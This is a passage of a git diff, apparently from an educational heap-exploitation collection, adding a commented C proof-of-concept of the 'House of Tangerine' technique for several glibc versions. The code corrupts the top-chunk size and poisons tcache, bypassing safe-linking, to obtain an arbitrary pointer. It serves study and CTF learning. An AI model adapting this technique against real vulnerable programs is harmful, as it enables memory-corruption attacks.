++++++++++++++++++++++++++++++++ glibc_2.37/house_of_tangerine.c | 161 ++++++++++++++++++++++++++++++++ glibc_2.38/house_of_tangerine.c | 161 ++++++++++++++++++++++++++++++++ 7 files changed, 975 insertions(+), 9 deletions(-) create mode 100644 glibc_2.32/house_of_tangerine.c create mode 100644 glibc_2.33/house_of_tangerine.c create mode 100644 glibc_2.35/house_of_tangerine.c create mode 100644 glibc_2.36/house_of_tangerine.c create mode 100644 glibc_2.37/house_of_tangerine.c create mode 100644 glibc_2.38/house_of_tangerine.c diff --git a/Makefile b/Makefile index 7a51557..27bfc2e 100644 --- a/Makefile +++ b/Makefile @@ -1,15 +1,15 @@ BASE = malloc_playground first_fit calc_tcache_idx V2.23 = fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack house_of_einherjar house_of_force house_of_gods house_of_lore house_of_mind_fastbin house_of_orange house_of_roman house_of_spirit house_of_storm large_bin_attack mmap_overlapping_chunks overlapping_chunks overlapping_chunks_2 poison_null_byte unsafe_unlink unsorted_bin_attack unsorted_bin_into_stack sysmalloc_int_free V2.24 = fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack house_of_einherjar house_of_force house_of_gods house_of_lore house_of_mind_fastbin house_of_roman house_of_spirit 
house_of_storm large_bin_attack mmap_overlapping_chunks overlapping_chunks overlapping_chunks_2 poison_null_byte unsafe_unlink unsorted_bin_attack unsorted_bin_into_stack sysmalloc_int_free -V2.27 = fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_force house_of_lore house_of_mind_fastbin house_of_spirit house_of_storm large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink unsorted_bin_attack unsorted_bin_into_stack sysmalloc_int_free -V2.31 = fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink sysmalloc_int_free -V2.32 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free -V2.33 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free -V2.34 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free -V2.35 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free -V2.36 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free -V2.37 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free -V2.38 = 
decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free +V2.27 = fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_force house_of_lore house_of_mind_fastbin house_of_spirit house_of_storm large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink unsorted_bin_attack unsorted_bin_into_stack sysmalloc_int_free house_of_tangerine +V2.31 = fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink sysmalloc_int_free house_of_tangerine +V2.32 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free house_of_tangerine +V2.33 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free house_of_tangerine +V2.34 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free house_of_tangerine +V2.35 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free house_of_tangerine +V2.36 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free house_of_tangerine +V2.37 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate 
fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free house_of_tangerine +V2.38 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free house_of_tangerine # turn technique names into paths VV2.23 = $(addprefix glibc_2.23/, $(V2.23)) diff --git a/glibc_2.32/house_of_tangerine.c b/glibc_2.32/house_of_tangerine.c new file mode 100644 index 0000000..fe789a2 --- /dev/null +++ b/glibc_2.32/house_of_tangerine.c @@ -0,0 +1,161 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include + +#define SIZE_SZ sizeof(size_t) + +#define CHUNK_HDR_SZ (SIZE_SZ*2) +// same for x86_64 and x86 +#define MALLOC_ALIGN 0x10L +#define MALLOC_MASK (-MALLOC_ALIGN) + +#define PAGESIZE sysconf(_SC_PAGESIZE) +#define PAGE_MASK (PAGESIZE-1) + +// fencepost are offsets removed from the top before freeing +#define FENCEPOST (2*CHUNK_HDR_SZ) + +#define PROBE (0x20-CHUNK_HDR_SZ) + +// size used for poisoned tcache +#define CHUNK_SIZE_1 0x40 +#define SIZE_1 (CHUNK_SIZE_1-CHUNK_HDR_SZ) + +// could also be split into multiple lower size allocations +#define CHUNK_SIZE_3 (PAGESIZE-(2*MALLOC_ALIGN)-CHUNK_SIZE_1) +#define SIZE_3 (CHUNK_SIZE_3-CHUNK_HDR_SZ) + +/** + * Tested on GLIBC 2.34 (x86_64, x86 & aarch64) & 2.39 (x86_64, x86 & aarch64) + * + * House of Tangerine is the modernized version of House of Orange + * and is able to corrupt heap without needing to call free() directly + * + * it uses the _int_free call to the top_chunk (wilderness) in sysmalloc + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * + * tcache-poisoning is used to trick malloc into returning a malloc aligned arbitrary pointer + * by abusing the tcache freelist. (requires heap leak on and after 2.32) + * + * this version expects a positive and negative OOB (e.g. 
BOF) + * or a positive OOB in editing a previous chunk + * + * This version requires 5 (6*) malloc calls and 3 OOB + * + * *to make the PoC more reliable we need to malloc and probe the current top chunk size, + * this should be predictable in an actual exploit and therefore, can be removed to get 5 malloc calls instead + * + * Special Thanks to pepsipu for creating the challenge "High Frequency Trading" + * from Pico CTF 2024 that inspired this exploitation technique + */ +int main() { + size_t size_2, *top_size_ptr, top_size, new_top_size, freed_top_size, vuln_tcache, target, *heap_ptr; + char win[0x10] = "WIN\0WIN\0WIN\0\x06\xfe\x1b\xe2"; + // disable buffering + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); + + // check if all chunks sizes are aligned + assert((CHUNK_SIZE_1 & MALLOC_MASK) == CHUNK_SIZE_1); + assert((CHUNK_SIZE_3 & MALLOC_MASK) == CHUNK_SIZE_3); + + puts("Constants:"); + printf("chunk header = 0x%lx\n", CHUNK_HDR_SZ); + printf("malloc align = 0x%lx\n", MALLOC_ALIGN); + printf("page align = 0x%lx\n", PAGESIZE); + printf("fencepost size = 0x%lx\n", FENCEPOST); + printf("size_1 = 0x%lx\n", SIZE_1); + + printf("target tcache top size = 0x%lx\n", CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_SIZE_1); + + // target is malloc aligned 0x10 + target = ((size_t) win + (MALLOC_ALIGN - 1)) & MALLOC_MASK; + + // probe the current size of the top_chunk, + // can be skipped if it is already known or predictable + heap_ptr = malloc(PROBE); + top_size = heap_ptr[(PROBE / SIZE_SZ) + 1]; + printf("first top size = 0x%lx\n", top_size); + + // calculate size_2 + + size_2 = top_size - CHUNK_HDR_SZ - (2 * MALLOC_ALIGN) - CHUNK_SIZE_1; + size_2 &= PAGE_MASK; + size_2 &= MALLOC_MASK; + + + printf("size_2 = 0x%lx\n", size_2); + + // first allocation + heap_ptr = malloc(size_2); + + // use BOF or OOB to corrupt the top_chunk + top_size_ptr = &heap_ptr[(size_2 / SIZE_SZ) - 1 + (MALLOC_ALIGN / SIZE_SZ)]; + + top_size = *top_size_ptr; + + printf("first top size = 0x%lx\n", top_size); + + // make sure corrupt top size is page aligned, generally 0x1000 + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2599 + new_top_size = top_size & PAGE_MASK; + *top_size_ptr = new_top_size; + printf("new first top size = 0x%lx\n", new_top_size); + + // remove fencepost from top_chunk, to get size that will be freed + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2895 + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + assert(freed_top_size == CHUNK_SIZE_1); + + /* + * malloc (larger than available_top_size), to free previous top_chunk using _int_free. 
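+ * (Illustrative numbers only, assuming the 64-bit constants defined above and
+ * 0x1000-byte pages: the corrupted top size keeps just its page-offset bits,
+ * roughly CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_SIZE_1 = 0x10 + 0x10 + 0x40 = 0x60;
+ * carving off the fencepost then leaves
+ * (0x60 - FENCEPOST) & MALLOC_MASK = (0x60 - 0x20) & ~0xf = 0x40 = CHUNK_SIZE_1,
+ * which is the 0x40 tcache bin that the later malloc(SIZE_1) calls draw from.)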
+ * This happens inside sysmalloc, where the top_chunk gets freed if it can't be merged + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * we prevent the top_chunk from being merged by lowering its size + * we can also circumvent corruption checks by keeping PAGE_MASK bits unchanged + */ + + printf("size_3 = 0x%lx\n", SIZE_3); + heap_ptr = malloc(SIZE_3); + + top_size = heap_ptr[(SIZE_3 / SIZE_SZ) + 1]; + printf("current top size = 0x%lx\n", top_size); + + // make sure corrupt top size is page aligned, generally 0x1000 + new_top_size = top_size & PAGE_MASK; + heap_ptr[(SIZE_3 / SIZE_SZ) + 1] = new_top_size; + printf("new top size = 0x%lx\n", new_top_size); + + // remove fencepost from top_chunk, to get size that will be freed + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + printf("freed top_chunk size = 0x%lx\n", freed_top_size); + + assert(freed_top_size == CHUNK_SIZE_1); + + // this will be our vuln_tcache for tcache poisoning + vuln_tcache = (size_t) &heap_ptr[(SIZE_3 / SIZE_SZ) + 2]; + + printf("tcache next ptr: 0x%lx\n", vuln_tcache); + + // free the previous top_chunk + heap_ptr = malloc(SIZE_3); + + // corrupt next ptr into pointing to target + // use a heap leak to bypass safe linking (GLIBC >= 2.32) + heap_ptr[(vuln_tcache - (size_t) heap_ptr) / SIZE_SZ] = target ^ (vuln_tcache >> 12); + + // allocate first tcache (corrupt next tcache bin) + heap_ptr = malloc(SIZE_1); + + // get arbitrary ptr for reads or writes + heap_ptr = malloc(SIZE_1); + + // proof that heap_ptr now points to the same string as target + assert((size_t) heap_ptr == target); + puts((char *) heap_ptr); +} diff --git a/glibc_2.33/house_of_tangerine.c b/glibc_2.33/house_of_tangerine.c new file mode 100644 index 0000000..fe789a2 --- /dev/null +++ b/glibc_2.33/house_of_tangerine.c @@ -0,0 +1,161 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include + +#define SIZE_SZ sizeof(size_t) + +#define CHUNK_HDR_SZ (SIZE_SZ*2) +// same for x86_64 and x86 +#define MALLOC_ALIGN 0x10L +#define MALLOC_MASK (-MALLOC_ALIGN) + +#define PAGESIZE sysconf(_SC_PAGESIZE) +#define PAGE_MASK (PAGESIZE-1) + +// fencepost are offsets removed from the top before freeing +#define FENCEPOST (2*CHUNK_HDR_SZ) + +#define PROBE (0x20-CHUNK_HDR_SZ) + +// size used for poisoned tcache +#define CHUNK_SIZE_1 0x40 +#define SIZE_1 (CHUNK_SIZE_1-CHUNK_HDR_SZ) + +// could also be split into multiple lower size allocations +#define CHUNK_SIZE_3 (PAGESIZE-(2*MALLOC_ALIGN)-CHUNK_SIZE_1) +#define SIZE_3 (CHUNK_SIZE_3-CHUNK_HDR_SZ) + +/** + * Tested on GLIBC 2.34 (x86_64, x86 & aarch64) & 2.39 (x86_64, x86 & aarch64) + * + * House of Tangerine is the modernized version of House of Orange + * and is able to corrupt heap without needing to call free() directly + * + * it uses the _int_free call to the top_chunk (wilderness) in sysmalloc + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * + * tcache-poisoning is used to trick malloc into returning a malloc aligned arbitrary pointer + * by abusing the tcache freelist. (requires heap leak on and after 2.32) + * + * this version expects a positive and negative OOB (e.g. 
BOF) + * or a positive OOB in editing a previous chunk + * + * This version requires 5 (6*) malloc calls and 3 OOB + * + * *to make the PoC more reliable we need to malloc and probe the current top chunk size, + * this should be predictable in an actual exploit and therefore, can be removed to get 5 malloc calls instead + * + * Special Thanks to pepsipu for creating the challenge "High Frequency Trading" + * from Pico CTF 2024 that inspired this exploitation technique + */ +int main() { + size_t size_2, *top_size_ptr, top_size, new_top_size, freed_top_size, vuln_tcache, target, *heap_ptr; + char win[0x10] = "WIN\0WIN\0WIN\0\x06\xfe\x1b\xe2"; + // disable buffering + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); + + // check if all chunks sizes are aligned + assert((CHUNK_SIZE_1 & MALLOC_MASK) == CHUNK_SIZE_1); + assert((CHUNK_SIZE_3 & MALLOC_MASK) == CHUNK_SIZE_3); + + puts("Constants:"); + printf("chunk header = 0x%lx\n", CHUNK_HDR_SZ); + printf("malloc align = 0x%lx\n", MALLOC_ALIGN); + printf("page align = 0x%lx\n", PAGESIZE); + printf("fencepost size = 0x%lx\n", FENCEPOST); + printf("size_1 = 0x%lx\n", SIZE_1); + + printf("target tcache top size = 0x%lx\n", CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_SIZE_1); + + // target is malloc aligned 0x10 + target = ((size_t) win + (MALLOC_ALIGN - 1)) & MALLOC_MASK; + + // probe the current size of the top_chunk, + // can be skipped if it is already known or predictable + heap_ptr = malloc(PROBE); + top_size = heap_ptr[(PROBE / SIZE_SZ) + 1]; + printf("first top size = 0x%lx\n", top_size); + + // calculate size_2 + + size_2 = top_size - CHUNK_HDR_SZ - (2 * MALLOC_ALIGN) - CHUNK_SIZE_1; + size_2 &= PAGE_MASK; + size_2 &= MALLOC_MASK; + + + printf("size_2 = 0x%lx\n", size_2); + + // first allocation + heap_ptr = malloc(size_2); + + // use BOF or OOB to corrupt the top_chunk + top_size_ptr = &heap_ptr[(size_2 / SIZE_SZ) - 1 + (MALLOC_ALIGN / SIZE_SZ)]; + + top_size = *top_size_ptr; + + printf("first top size = 0x%lx\n", top_size); + + // make sure corrupt top size is page aligned, generally 0x1000 + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2599 + new_top_size = top_size & PAGE_MASK; + *top_size_ptr = new_top_size; + printf("new first top size = 0x%lx\n", new_top_size); + + // remove fencepost from top_chunk, to get size that will be freed + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2895 + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + assert(freed_top_size == CHUNK_SIZE_1); + + /* + * malloc (larger than available_top_size), to free previous top_chunk using _int_free. 
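+ * (Illustrative numbers only, assuming the 64-bit constants defined above and
+ * 0x1000-byte pages: the corrupted top size keeps just its page-offset bits,
+ * roughly CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_SIZE_1 = 0x10 + 0x10 + 0x40 = 0x60;
+ * carving off the fencepost then leaves
+ * (0x60 - FENCEPOST) & MALLOC_MASK = (0x60 - 0x20) & ~0xf = 0x40 = CHUNK_SIZE_1,
+ * which is the 0x40 tcache bin that the later malloc(SIZE_1) calls draw from.)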
+ * This happens inside sysmalloc, where the top_chunk gets freed if it can't be merged + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * we prevent the top_chunk from being merged by lowering its size + * we can also circumvent corruption checks by keeping PAGE_MASK bits unchanged + */ + + printf("size_3 = 0x%lx\n", SIZE_3); + heap_ptr = malloc(SIZE_3); + + top_size = heap_ptr[(SIZE_3 / SIZE_SZ) + 1]; + printf("current top size = 0x%lx\n", top_size); + + // make sure corrupt top size is page aligned, generally 0x1000 + new_top_size = top_size & PAGE_MASK; + heap_ptr[(SIZE_3 / SIZE_SZ) + 1] = new_top_size; + printf("new top size = 0x%lx\n", new_top_size); + + // remove fencepost from top_chunk, to get size that will be freed + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + printf("freed top_chunk size = 0x%lx\n", freed_top_size); + + assert(freed_top_size == CHUNK_SIZE_1); + + // this will be our vuln_tcache for tcache poisoning + vuln_tcache = (size_t) &heap_ptr[(SIZE_3 / SIZE_SZ) + 2]; + + printf("tcache next ptr: 0x%lx\n", vuln_tcache); + + // free the previous top_chunk + heap_ptr = malloc(SIZE_3); + + // corrupt next ptr into pointing to target + // use a heap leak to bypass safe linking (GLIBC >= 2.32) + heap_ptr[(vuln_tcache - (size_t) heap_ptr) / SIZE_SZ] = target ^ (vuln_tcache >> 12); + + // allocate first tcache (corrupt next tcache bin) + heap_ptr = malloc(SIZE_1); + + // get arbitrary ptr for reads or writes + heap_ptr = malloc(SIZE_1); + + // proof that heap_ptr now points to the same string as target + assert((size_t) heap_ptr == target); + puts((char *) heap_ptr); +} diff --git a/glibc_2.35/house_of_tangerine.c b/glibc_2.35/house_of_tangerine.c new file mode 100644 index 0000000..fe789a2 --- /dev/null +++ b/glibc_2.35/house_of_tangerine.c @@ -0,0 +1,161 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include + +#define SIZE_SZ sizeof(size_t) + +#define CHUNK_HDR_SZ (SIZE_SZ*2) +// same for x86_64 and x86 +#define MALLOC_ALIGN 0x10L +#define MALLOC_MASK (-MALLOC_ALIGN) + +#define PAGESIZE sysconf(_SC_PAGESIZE) +#define PAGE_MASK (PAGESIZE-1) + +// fencepost are offsets removed from the top before freeing +#define FENCEPOST (2*CHUNK_HDR_SZ) + +#define PROBE (0x20-CHUNK_HDR_SZ) + +// size used for poisoned tcache +#define CHUNK_SIZE_1 0x40 +#define SIZE_1 (CHUNK_SIZE_1-CHUNK_HDR_SZ) + +// could also be split into multiple lower size allocations +#define CHUNK_SIZE_3 (PAGESIZE-(2*MALLOC_ALIGN)-CHUNK_SIZE_1) +#define SIZE_3 (CHUNK_SIZE_3-CHUNK_HDR_SZ) + +/** + * Tested on GLIBC 2.34 (x86_64, x86 & aarch64) & 2.39 (x86_64, x86 & aarch64) + * + * House of Tangerine is the modernized version of House of Orange + * and is able to corrupt heap without needing to call free() directly + * + * it uses the _int_free call to the top_chunk (wilderness) in sysmalloc + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * + * tcache-poisoning is used to trick malloc into returning a malloc aligned arbitrary pointer + * by abusing the tcache freelist. (requires heap leak on and after 2.32) + * + * this version expects a positive and negative OOB (e.g. 
BOF) + * or a positive OOB in editing a previous chunk + * + * This version requires 5 (6*) malloc calls and 3 OOB + * + * *to make the PoC more reliable we need to malloc and probe the current top chunk size, + * this should be predictable in an actual exploit and therefore, can be removed to get 5 malloc calls instead + * + * Special Thanks to pepsipu for creating the challenge "High Frequency Trading" + * from Pico CTF 2024 that inspired this exploitation technique + */ +int main() { + size_t size_2, *top_size_ptr, top_size, new_top_size, freed_top_size, vuln_tcache, target, *heap_ptr; + char win[0x10] = "WIN\0WIN\0WIN\0\x06\xfe\x1b\xe2"; + // disable buffering + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); + + // check if all chunks sizes are aligned + assert((CHUNK_SIZE_1 & MALLOC_MASK) == CHUNK_SIZE_1); + assert((CHUNK_SIZE_3 & MALLOC_MASK) == CHUNK_SIZE_3); + + puts("Constants:"); + printf("chunk header = 0x%lx\n", CHUNK_HDR_SZ); + printf("malloc align = 0x%lx\n", MALLOC_ALIGN); + printf("page align = 0x%lx\n", PAGESIZE); + printf("fencepost size = 0x%lx\n", FENCEPOST); + printf("size_1 = 0x%lx\n", SIZE_1); + + printf("target tcache top size = 0x%lx\n", CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_SIZE_1); + + // target is malloc aligned 0x10 + target = ((size_t) win + (MALLOC_ALIGN - 1)) & MALLOC_MASK; + + // probe the current size of the top_chunk, + // can be skipped if it is already known or predictable + heap_ptr = malloc(PROBE); + top_size = heap_ptr[(PROBE / SIZE_SZ) + 1]; + printf("first top size = 0x%lx\n", top_size); + + // calculate size_2 + + size_2 = top_size - CHUNK_HDR_SZ - (2 * MALLOC_ALIGN) - CHUNK_SIZE_1; + size_2 &= PAGE_MASK; + size_2 &= MALLOC_MASK; + + + printf("size_2 = 0x%lx\n", size_2); + + // first allocation + heap_ptr = malloc(size_2); + + // use BOF or OOB to corrupt the top_chunk + top_size_ptr = &heap_ptr[(size_2 / SIZE_SZ) - 1 + (MALLOC_ALIGN / SIZE_SZ)]; + + top_size = *top_size_ptr; + + printf("first top size = 0x%lx\n", top_size); + + // make sure corrupt top size is page aligned, generally 0x1000 + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2599 + new_top_size = top_size & PAGE_MASK; + *top_size_ptr = new_top_size; + printf("new first top size = 0x%lx\n", new_top_size); + + // remove fencepost from top_chunk, to get size that will be freed + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2895 + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + assert(freed_top_size == CHUNK_SIZE_1); + + /* + * malloc (larger than available_top_size), to free previous top_chunk using _int_free. 
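+ * (Illustrative numbers only, assuming the 64-bit constants defined above and
+ * 0x1000-byte pages: the corrupted top size keeps just its page-offset bits,
+ * roughly CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_SIZE_1 = 0x10 + 0x10 + 0x40 = 0x60;
+ * carving off the fencepost then leaves
+ * (0x60 - FENCEPOST) & MALLOC_MASK = (0x60 - 0x20) & ~0xf = 0x40 = CHUNK_SIZE_1,
+ * which is the 0x40 tcache bin that the later malloc(SIZE_1) calls draw from.)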
+ * This happens inside sysmalloc, where the top_chunk gets freed if it can't be merged + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * we prevent the top_chunk from being merged by lowering its size + * we can also circumvent corruption checks by keeping PAGE_MASK bits unchanged + */ + + printf("size_3 = 0x%lx\n", SIZE_3); + heap_ptr = malloc(SIZE_3); + + top_size = heap_ptr[(SIZE_3 / SIZE_SZ) + 1]; + printf("current top size = 0x%lx\n", top_size); + + // make sure corrupt top size is page aligned, generally 0x1000 + new_top_size = top_size & PAGE_MASK; + heap_ptr[(SIZE_3 / SIZE_SZ) + 1] = new_top_size; + printf("new top size = 0x%lx\n", new_top_size); + + // remove fencepost from top_chunk, to get size that will be freed + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + printf("freed top_chunk size = 0x%lx\n", freed_top_size); + + assert(freed_top_size == CHUNK_SIZE_1); + + // this will be our vuln_tcache for tcache poisoning + vuln_tcache = (size_t) &heap_ptr[(SIZE_3 / SIZE_SZ) + 2]; + + printf("tcache next ptr: 0x%lx\n", vuln_tcache); + + // free the previous top_chunk + heap_ptr = malloc(SIZE_3); + + // corrupt next ptr into pointing to target + // use a heap leak to bypass safe linking (GLIBC >= 2.32) + heap_ptr[(vuln_tcache - (size_t) heap_ptr) / SIZE_SZ] = target ^ (vuln_tcache >> 12); + + // allocate first tcache (corrupt next tcache bin) + heap_ptr = malloc(SIZE_1); + + // get arbitrary ptr for reads or writes + heap_ptr = malloc(SIZE_1); + + // proof that heap_ptr now points to the same string as target + assert((size_t) heap_ptr == target); + puts((char *) heap_ptr); +} diff --git a/glibc_2.36/house_of_tangerine.c b/glibc_2.36/house_of_tangerine.c new file mode 100644 index 0000000..fe789a2 --- /dev/null +++ b/glibc_2.36/house_of_tangerine.c @@ -0,0 +1,161 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include + +#define SIZE_SZ sizeof(size_t) + +#define CHUNK_HDR_SZ (SIZE_SZ*2) +// same for x86_64 and x86 +#define MALLOC_ALIGN 0x10L +#define MALLOC_MASK (-MALLOC_ALIGN) + +#define PAGESIZE sysconf(_SC_PAGESIZE) +#define PAGE_MASK (PAGESIZE-1) + +// fencepost are offsets removed from the top before freeing +#define FENCEPOST (2*CHUNK_HDR_SZ) + +#define PROBE (0x20-CHUNK_HDR_SZ) + +// size used for poisoned tcache +#define CHUNK_SIZE_1 0x40 +#define SIZE_1 (CHUNK_SIZE_1-CHUNK_HDR_SZ) + +// could also be split into multiple lower size allocations +#define CHUNK_SIZE_3 (PAGESIZE-(2*MALLOC_ALIGN)-CHUNK_SIZE_1) +#define SIZE_3 (CHUNK_SIZE_3-CHUNK_HDR_SZ) + +/** + * Tested on GLIBC 2.34 (x86_64, x86 & aarch64) & 2.39 (x86_64, x86 & aarch64) + * + * House of Tangerine is the modernized version of House of Orange + * and is able to corrupt heap without needing to call free() directly + * + * it uses the _int_free call to the top_chunk (wilderness) in sysmalloc + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * + * tcache-poisoning is used to trick malloc into returning a malloc aligned arbitrary pointer + * by abusing the tcache freelist. (requires heap leak on and after 2.32) + * + * this version expects 